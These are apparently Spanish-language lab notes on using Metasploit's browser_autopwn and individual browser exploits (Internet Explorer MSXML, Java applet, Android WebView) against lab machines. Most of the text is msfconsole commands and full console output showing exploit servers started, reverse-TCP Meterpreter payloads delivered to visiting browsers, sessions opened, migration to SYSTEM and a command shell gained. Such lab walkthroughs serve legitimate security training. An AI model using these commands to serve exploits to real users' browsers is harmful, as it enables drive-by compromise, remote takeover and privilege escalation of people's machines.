Browser_Autopwm Metasploit_Revelated_Sagar_Rahalkar
resumen en portada
Browser auto_pwn
Lanza un moton de exploits. Ojo Tarda bastante en generar todo.
Unos 5-10 Minutos (observa con top el uso cpu)
use auxiliary/server/browser_autopwn
set srvhost 192.168.56.102
set lhost 192.168.56.102
set srvport 80
set uripath /
show options
run
use auxiliary/server/browser_autopwn
set srvhost 192.168.56.102
set lhost 192.168.56.102
show options
run
msf5 > use auxiliary/server/browser_autopwn msf5 auxiliary(server/browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Auxiliary action: Name Description ---- ----------- WebServer Start a bunch of modules and direct clients to appropriate exploits msf5 auxiliary(server/browser_autopwn) > set lhost 192.168.56.101 lhost => 192.168.56.101 msf5 auxiliary(server/browser_autopwn) > run [*] Auxiliary module running as background job 0. [*] Setup [*] Starting exploit modules on host 192.168.56.101... [*] ---
Ahora hay que esperar un buen rato a que carguen todos los exploits.
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/yGiWU [*] Local IP: http://127.0.0.1:8080/yGiWU [*] Server started. [*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp [*] Using URL: http://0.0.0.0:8080/TGGGYVw [*] Local IP: http://127.0.0.1:8080/TGGGYVw [*] Server started. [*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp [*] Using URL: http://0.0.0.0:8080/kIGy [*] Local IP: http://127.0.0.1:8080/kIGy [*] Server started. [*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp [*] Using URL: http://0.0.0.0:8080/RXyHLJOQhJTC [*] Local IP: http://127.0.0.1:8080/RXyHLJOQhJTC [*] Server started. [*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/MfKHQmsvNN [*] Local IP: http://127.0.0.1:8080/MfKHQmsvNN [*] Server started. [*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/RDjFyhiPzK [*] Local IP: http://127.0.0.1:8080/RDjFyhiPzK [*] Server started. [*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/LBMmJJObUvOy [*] Local IP: http://127.0.0.1:8080/LBMmJJObUvOy [*] Server started. [*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/yITfixb [*] Local IP: http://127.0.0.1:8080/yITfixb [*] Server started. [*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/DOlFViQbnW [*] Local IP: http://127.0.0.1:8080/DOlFViQbnW [*] Server started. [*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/szJQqrADM [*] Local IP: http://127.0.0.1:8080/szJQqrADM [*] Server started. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp [*] Using URL: http://0.0.0.0:8080/CdgiAE [*] Local IP: http://127.0.0.1:8080/CdgiAE [*] Server started. [*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/CSpvCIPt [*] Local IP: http://127.0.0.1:8080/CSpvCIPt [*] Server started. [*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/yXDuCwl [*] Local IP: http://127.0.0.1:8080/yXDuCwl [*] Server started. [*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/fKRz [*] Local IP: http://127.0.0.1:8080/fKRz [*] Server started. [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/gxCOVYqvcQPy [*] Local IP: http://127.0.0.1:8080/gxCOVYqvcQPy [*] Server started. [*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/eBnPp [*] Local IP: http://127.0.0.1:8080/eBnPp [*] Server started. [*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/tIzVVYUeZovqP [*] Local IP: http://127.0.0.1:8080/tIzVVYUeZovqP [*] Server started. [*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/OaCHr [*] Local IP: http://127.0.0.1:8080/OaCHr [*] Server started. [*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/MJgTBfD [*] Local IP: http://127.0.0.1:8080/MJgTBfD [*] Server started. [*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/rGoTxmWmCIxCQ [*] Local IP: http://127.0.0.1:8080/rGoTxmWmCIxCQ [*] Server started.
Cuando termina de cargar deberia aparecer esto:
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 [*] Starting handler for generic/shell_reverse_tcp on port 6666 [*] Started reverse TCP handler on 192.168.56.101:3333 [*] Starting handler for java/meterpreter/reverse_tcp on port 7777 [*] Started reverse TCP handler on 192.168.56.101:6666 [*] Started reverse TCP handler on 192.168.56.101:7777 [*] --- Done, found 20 exploit modules [*] Using URL: http://0.0.0.0:8080/y7MmvCi [*] Local IP: http://127.0.0.1:8080/y7MmvCi [*] Server started.
Al conectarse un navegador a la url http://192.168.56.101:8080/y7MmvCi
[*] Handling '/y7MmvCi' [*] Handling '/y7MmvCi?sessid=V2luZG93cyBYUDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDpTUDM6ZXM6eDg2Ok1TSUU6Ni4wOg%3d%3d' [*] JavaScript Report: Windows XP:undefined:undefined:undefined:SP3:es:x86:MSIE:6.0: [*] Responding with 14 exploits [*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/ [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/ [*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/ [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb [*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/ [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/ [*] 192.168.56.103 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request [*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/ [*] 192.168.56.103 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/ [*] 192.168.56.103 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution [*] 192.168.56.103 java_verifier_field_access - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK [*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb [*] 192.168.56.103 ie_createobject - Sending exploit HTML... [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/ [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/ [*] 192.168.56.103 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request [*] 192.168.56.103 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution [*] 192.168.56.103 java_verifier_field_access - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK [*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability [*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb [*] 192.168.56.103 ie_createobject - Sending exploit HTML... [*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/ [*] 192.168.56.103 java_jre17_provider_skeleton - handling request for /LBMmJJObUvOy [*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/ [*] 192.168.56.103 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request [*] 192.168.56.103 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution [*] 192.168.56.103 java_verifier_field_access - Generated jar to drop (5311 bytes). [*] 192.168.56.103 java_jre17_provider_skeleton - handling request for /LBMmJJObUvOy/
No funciona. hay que instalar java en la maquina cliente.
uso version 1.7.0 jre-7-windows-i586.exe
Al conectar el navegador a la url esta vez se ve esto:
[*] 192.168.56.1 java_atomicreferencearray - Sending jar [*] Sending stage (53844 bytes) to 192.168.56.1 [*] Meterpreter session 14 opened (192.168.56.101:7777 -> 192.168.56.1:50818) at 2019-07-26 14:43:40 -0400 [*] Session ID 14 (192.168.56.101:7777 -> 192.168.56.1:50818) processing InitialAutoRunScript 'migrate -f' [!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate. [!] Example: run post/windows/manage/migrate OPTION=value [...]
Y .. aparece un Session ID 14.
msf5 auxiliary(server/browser_autopwn) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 15 meterpreter java/windows pp @ xpentst 192.168.56.101:7777 -> 192.168.56.1:50828 (10.0.2.15) 16 meterpreter java/windows pp @ xpentst 192.168.56.101:7777 -> 192.168.56.1:50830 (10.0.2.15) 17 meterpreter java/windows pp @ xpentst 192.168.56.101:7777 -> 192.168.56.1:50884 (10.0.2.15) 18 meterpreter java/windows pp @ xpentst 192.168.56.101:7777 -> 192.168.56.1:50894 (10.0.2.15) 19 meterpreter java/windows pp @ xpentst 192.168.56.101:7777 -> 192.168.56.1:50896 (10.0.2.15) msf5 auxiliary(server/browser_autopwn) >
Nota: Aparecen varias por PC es porque hay mas de una vulnerabilidad.
Me conecto a una sesion y ya tengo meterpreter.
msf5 auxiliary(server/browser_autopwn) > sessions -i 18 [*] Starting interaction with 18... meterpreter > sysinfo Computer : xpentst OS : Windows XP 5.1 (x86) Meterpreter : java/windows meterpreter >
use exploit/windows/browser/msxml_get_definition_code_exec
run
msf5 > use exploit/windows/browser/msxml_get_definition_code_exec msf5 exploit(windows/browser/msxml_get_definition_code_exec) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.43.204:4444 [*] Using URL: http://0.0.0.0:8080/Xh30XH [*] Local IP: http://192.168.43.204:8080/Xh30XH [*] Server started.
Cuando se conecta un cliente vulnerable a la url: http://192.168.43.204:8080/Xh30XH
[*] 192.168.43.124 msxml_get_definition_code_exec - 192.168.43.124:60208 - Sending html [*] Sending stage (179779 bytes) to 192.168.43.124 [*] Meterpreter session 1 opened (192.168.43.204:4444 -> 192.168.43.124:57732) at 2019-08-06 21:00:20 +0000 [*] Session ID 1 (192.168.43.204:4444 -> 192.168.43.124:57732) processing InitialAutoRunScript 'post/windows/manage/priv_migrate' [*] Current session process is iexplore.exe (1908) as: HOME\pp [*] Session is Admin but not System. [*] Will attempt to migrate to specified System level process. [*] Trying services.exe (464) [+] Successfully migrated to services.exe (464) as: NT AUTHORITY\SYSTEM
Para interactuar con la sesion1: `sessions -i 1`
msf5 exploit(windows/browser/msxml_get_definition_code_exec) > sessions -i 1 [*] Starting interaction with 3... meterpreter >
Informacion del sistema `sysinfo` y shell `shell`
meterpreter > sysinfo Computer : HOME OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : es_MX Domain : GRUPO_TRABAJO Logged On Users : 2 Meterpreter : x86/windows meterpreter > shell Process 704 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
Otros:(que han funcionado) * multi/browser/java_verifier_field_access (con java 7) * multi/browser/java_rhino * multi/browser/java_atomicreferencearray * multi/browser/java_jre17_provider_skeleton Payloads * generic/shell_reverse_tcp * java/meterpreter/reverse_tcp * windows/meterpreter/reverse_tcp ___ _______________________________
___ Intento (no funciona(aun)) meterpreter en windows/Android desde url: ``` use exploit/android/browser/webview_addjavascriptinterface set srvhost 192.168.56.102 set lhost 192.168.56.102 set srvport 80 set uripath / run ```
msf5 > use exploit/android/browser/webview_addjavascriptinterface msf5 exploit(android/browser/webview_addjavascriptinterface) > show options Module options (exploit/android/browser/webview_addjavascriptinterface): Name Current Setting Required Description ---- --------------- -------- ----------- Retries true no Allow the browser to retry the module SRVHOST 0.0.0.0 yes The local host to listen on. Address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(android/browser/webview_addjavascriptinterface) > set srvhost 192.168.1.4 msf5 exploit(android/browser/webview_addjavascriptinterface) > set srvport 80 msf5 exploit(android/browser/webview_addjavascriptinterface) > set uripath / msf5 exploit(android/browser/webview_addjavascriptinterface) > set lhost 192.168.1.4 msf5 exploit(android/browser/webview_addjavascriptinterface) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.1.4:4444 [*] Using URL: http://192.168.1.4:80/ [*] Server started. msf5 exploit(android/browser/webview_addjavascriptinterface) > [*] 192.168.1.230 webview_addjavascriptinterface - Gathering target information for 192.168.1.230 [*] 192.168.1.230 webview_addjavascriptinterface - Sending HTML response to 192.168.1.230 [-] 192.168.1.230 webview_addjavascriptinterface - Target 192.168.1.230 has requested an unknown path: /favicon.ico [!] 192.168.1.230 webview_addjavascriptinterface - Exploit requirement(s) not met: os_name, vuln_test. For more info: http://r-7.co/PVbcgx [!] 192.168.1.230 webview_addjavascriptinterface - No vulnerable Java objects were found in this web context. [*] 192.168.1.8 webview_addjavascriptinterface - Gathering target information for 192.168.1.8 [*] 192.168.1.8 webview_addjavascriptinterface - Sending HTML response to 192.168.1.8 [!] 192.168.1.8 webview_addjavascriptinterface - Exploit requirement(s) not met: os_name, vuln_test. For more info: http://r-7.co/PVbcgx [!] 192.168.1.8 webview_addjavascriptinterface - No vulnerable Java objects were found in this web context.